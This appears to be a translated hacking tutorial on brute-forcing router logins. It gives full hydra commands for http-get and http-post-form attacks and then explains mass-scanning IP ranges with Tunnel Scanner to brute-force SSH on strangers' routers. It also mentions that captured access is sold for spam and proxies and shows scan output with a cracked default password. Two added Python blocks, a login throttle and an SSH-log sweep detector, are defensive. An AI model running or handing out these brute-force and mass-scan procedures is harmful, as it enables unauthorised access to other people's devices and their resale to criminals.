Choose a password and login to the router. We capture the router: mass scan and brute force SSH. Instructions for using the application

*There could be a warning here that you should not use this program for criminal purposes, but hydra writes this before each hacking session*

I decided to dig into my router's settings for my own needs. I typed in the address familiar to everyone, and it asked for a password. What to do? Well, I started trying passwords, but their number is too large to go through them all and too small to justify a reset.

So I opened Google. After a couple of queries, I found out about such a thing as hydra. And then it began: the thirst for discovery, the search for the unknown, and so on.

Let's get started

First of all, I compiled a password dictionary of no more and no less than 25 combinations. Next, download either Kali Linux or Hydra itself (if you are a penguin, that is, you run Linux). Now we have two options (well, sort of two: I found information on two options).

Either you get this dialog box:

Or the login and password are requested by a form on the site. Mine is the first option, so let's start with it. On our way to the "admin panel" there is a guard in the form of a dialog box. This type of authorization is http-get.

We open the terminal. Enter:

hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get /

Here "-l" is followed by the login, "-P" by the dictionary and "-s" by the port. Other flags are also available:

-R restore a previous interrupted/broken session

-S make an SSL connection

-s PORT if the service is not on the default port, set the port here

-l LOGIN or -L FILE log in with LOGIN (name), or load multiple logins from FILE

-p PASSWORD or -P FILE try PASSWORD, or load multiple passwords from FILE

-x MINIMUM:MAXIMUM:CHARSET generate passwords for brute force, type "-x -h" for help

-e nsr "n" - try an empty password, "s" - login as password and/or "r" - reversed login

-u loop around users, not passwords (effective! implied by the -x option)

-C FILE colon-separated "login:password" format, instead of the -L/-P options

-M FILE list of servers to attack, one entry per line; a port can be given after a colon ":"

-o FILE write found login/password pairs to FILE instead of standard output

-f / -F exit when a login/password pair is found (-M: -f per host, -F globally)

-t TASKS number of TASKS run in parallel (per host, default: 16)

-w / -W TIME response timeout (32 seconds) / wait between connections per thread

-4 / -6 prefer IPv4 (default) or IPv6 addresses

-v / -V / -d verbose mode / show username+password for each attempt / debug mode

-q do not print connection error messages

-U details of how to use the module

server target: DNS name, IP or 192.168.0.0/24 (this OR the -M option)

service the service to attack (see the list of supported protocols)

OPT some service modules support extra input (-U for module help)


Well, something like this:

Second option:

Not mine, honestly taken from Antichat, with the correction of the author's grammatical errors (I left an abundance of punctuation marks). I wonder if this can be considered a translation?

We are met by a form on the site:


This authentication method is http-post-form, and here we need to tinker a bit, since we need to understand how the browser sends data to the router.

In this case, I used the Chrome browser (its Chromium counterpart in Kali Linux, installed via apt-get install chromium).

Now you need to do one very stupid thing... specify the wrong username and pass...
Why we'll see later...

Press F12 to switch to web page editing mode.


Go to Network → turn on the Preserve log checkbox.


We enter false login and password ...

Well, what's up? Will not work! Moreover, after several unsuccessful login attempts, the form is blocked for 180 seconds.

Go to the HEADERS tab and look for the line:

Request URL: http://192.168.0.1/index.cgi

We cut off everything up to the IP address, leaving /index.cgi… Congratulations, we found the first part of the authorization script… Moving on… Go to the FORM DATA tab and change the display mode to VIEW SOURCE.

update_login=login&update_password=password&check_auth=y&tokenget=1300& update_login=login&update_password=password

Bingo! We found the second part of the authorization script! A little bit more! Now you need to find the page with the error message... You need to click on the ELEMENTS tab.

And choose the HTML element code (CTRL + SHIFT + C) and select the window with the error message ... in this case - Authentication failed!

Authentication failed!

Choose:

span langkey="bad_auth"

and fix it a bit... bad_auth - that's it! The key is practically in our pocket... Now we can write the full authorization string:

/index.cgi:update_login=login&update_password=password:bad_auth

Now you need to substitute ^USER^ instead of "login" and ^PASS^ instead of "password" and then the line will look like:

/index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth

We enter the command:

hydra -l admin -P router-pass.dic -t 1 -e nsr -vV -f -s 80 192.168.0.1 http-post-form "/index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth"

Please note that there is a colon between the parts of the script! It is necessary! By the way, there was no blocking of the form through the hydra ... This is very pleasing.


I can't verify that the second method works, since I don't have a suitable router model. You will have to trust the expressive person from Antichat.

If anyone is interested, please check and report back in the comments. I worked with a TL-WR1043N / TL-WR1043ND router. Antichat router - D-link300NRU.

Thank you for your attention!
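The quoted walkthrough notes that the form's 180-second block did not apply to requests sent by the tool. A lockout only holds when the failure counter is kept on the server and keyed on values the client cannot reset (the account name and the source address) rather than on browser-side state. The following is an added example, not code from either router's firmware: the class name, the threshold of five failures and the 25 sample guesses are assumptions, while the 180 seconds comes from the post.

```python
import time
from collections import defaultdict

MAX_FAILURES = 5    # assumed threshold; the post only says "several"
LOCK_SECONDS = 180  # lock duration reported in the post


class LoginThrottle:
    """Failure counters kept on the server, keyed by account and by source IP."""

    def __init__(self, max_failures=MAX_FAILURES, lock_seconds=LOCK_SECONDS,
                 clock=time.monotonic):
        self.max_failures = max_failures
        self.lock_seconds = lock_seconds
        self.clock = clock
        self._failures = defaultdict(list)  # key -> timestamps of recent failures
        self._locked_until = {}             # key -> time the lock expires

    def attempt(self, username, source_ip, password_ok):
        """Return 'locked', 'ok' or 'denied' for one login request.

        password_ok is the result of the real credential check.
        """
        now = self.clock()
        keys = (("user", username.lower()), ("ip", source_ip))
        # A locked key rejects the request whatever the password is, so a
        # correct guess made during the lock is not confirmed to the client.
        if any(self._locked_until.get(k, 0.0) > now for k in keys):
            return "locked"
        if password_ok:
            self._failures.pop(keys[0], None)  # reset the account counter only
            return "ok"
        for k in keys:
            recent = [t for t in self._failures[k] if now - t < self.lock_seconds]
            recent.append(now)
            self._failures[k] = recent
            if len(recent) >= self.max_failures:
                self._locked_until[k] = now + self.lock_seconds
                self._failures[k] = []
        return "denied"


def replay(guesses, real_password, seconds_between=1.0):
    """Replay a constructed guess list against a fresh throttle on a fake clock."""
    now = [0.0]
    throttle = LoginThrottle(clock=lambda: now[0])
    outcomes = []
    for guess in guesses:
        outcomes.append(throttle.attempt("admin", "192.0.2.10", guess == real_password))
        now[0] += seconds_between
    return outcomes


if __name__ == "__main__":
    # Constructed 25-entry list; the real password is the tenth entry.
    words = [f"guess{i:02d}" for i in range(25)]
    result = replay(words, real_password="guess09")
    print(result.count("denied"), "evaluated,", result.count("locked"), "rejected by lock")
```

Locking by account name lets anyone who knows the name lock the administrator out for a while, which is why the lock expires on its own instead of requiring a reset.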


Full-fledged servers usually have PAM (Pluggable Authentication Modules) configured to restrict access for a time specified in the config after several (usually three to five) unsuccessful login attempts. The Linux on a router, by contrast, is stripped down. There is no PAM on it, so nothing prevents it from being brute-forced. And this idea, brute-forcing and capturing routers, is, one might say, in trend today!

Our goal is your router

Why capture a router? It depends on the hacker's imagination: it can be used to send spam or turned into a private SOCKS proxy. The access can also be sold: according to one of my friends, this pleasure costs up to $200 a month, and the product is quite popular.

Scanning routers

To gain access, hackers use a simple but effective program Tunnel Scanner. The Type parameter specifies the type of scanning: by static login, by static password, by the list of logins/passwords. The third option (By Login;Password List) is usually the most efficient.

The Static parameter allows you to set the range of IP addresses that will be scanned. If you enable the IP ranges from file checkbox, then the range of IP addresses will be taken from the file specified in the IP ranges field (by default, this is a file named ip.txt). The ranges in it are indicated, as shown in the screenshot below.

The list of logins and passwords is specified by the Login;Password parameter. By default, it is taken from the words.txt file. Of course, the list example below is rather poor, but I think you can easily find a more advanced one on the Web (or you can be smart and create your own).


The Threads parameter specifies the number of concurrent brute-force threads. The default value is 900, which is more than enough. The Timeout parameter specifies the timeout in seconds between retries.

Well, it remains to press the Start button.

As you can see, we have already received the first results. Let's analyze them:

37.112.128.160 - failed to connect
37.112.128.164 - checking admin;admin
37.112.128.163 - failed to connect
37.112.128.162 - failed to connect : admin;admin
37.112.128.164 - checking support;support
37.112.128.164 - [-]: support;support
37.112.128.164 - checking root;123456
37.112.128.164 - [-]: root;123456
37.112.128.164 - checking ubnt;ubnt
37.112.128.164 - [-]: ubnt;ubnt
37.112.128.164 - checking ftp;123456
37.112.128.164 - [+]: ftp;123456
…

The number in square brackets is the thread number (it doesn't matter to us). Next comes the scanned IP address. The line failed to connect means that the SSH port is closed, either completely or for us (by a firewall). A line like [-]: admin;admin reports that the SSH port is open, but the password and/or login did not match. And a similar line with + says that everything was successful:
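Added example, not part of the original article: seen from the router's side, the default-credential sweep in the scanner output is one source address failing against several account names and then, in the bad case, being accepted. The Python below flags that pattern in SSH authentication logs. The function name and threshold are assumptions, and the log lines are constructed, use documentation IP ranges and assume OpenSSH's syslog message format.

```python
import re
from collections import defaultdict

# Constructed sample in OpenSSH syslog format; addresses are documentation ranges.
SAMPLE_LOG = """\
Mar  3 10:00:01 gw sshd[811]: Failed password for admin from 203.0.113.7 port 40112 ssh2
Mar  3 10:00:02 gw sshd[812]: Failed password for invalid user support from 203.0.113.7 port 40113 ssh2
Mar  3 10:00:03 gw sshd[813]: Failed password for root from 203.0.113.7 port 40114 ssh2
Mar  3 10:00:04 gw sshd[814]: Failed password for invalid user ubnt from 203.0.113.7 port 40115 ssh2
Mar  3 10:00:05 gw sshd[815]: Accepted password for ftp from 203.0.113.7 port 40116 ssh2
Mar  3 10:07:40 gw sshd[830]: Failed password for alice from 198.51.100.20 port 51010 ssh2
Mar  3 10:07:52 gw sshd[831]: Accepted password for alice from 198.51.100.20 port 51011 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def find_credential_sweeps(log_text, min_users=4):
    """Return {source_ip: finding} for sources that failed against many accounts.

    A finding lists the account names tried and, if a login was accepted
    after the failures began, the account that was accepted.
    """
    failed = defaultdict(set)  # ip -> account names with failed logins
    accepted_after = {}        # ip -> first account accepted after a failure
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if m is None:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failed[ip].add(user)
        elif ip in failed:
            # A success that follows failures from the same source.
            accepted_after.setdefault(ip, user)
    # One mistyped password (alice above) stays below the threshold;
    # a list of login;password pairs does not.
    return {
        ip: {"users_tried": sorted(users), "accepted": accepted_after.get(ip)}
        for ip, users in failed.items()
        if len(users) >= min_users
    }


if __name__ == "__main__":
    for ip, finding in find_credential_sweeps(SAMPLE_LOG).items():
        print(ip, finding)
```

The function treats one log excerpt as a whole; for continuous monitoring, run it over a sliding time window so that old failures age out.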
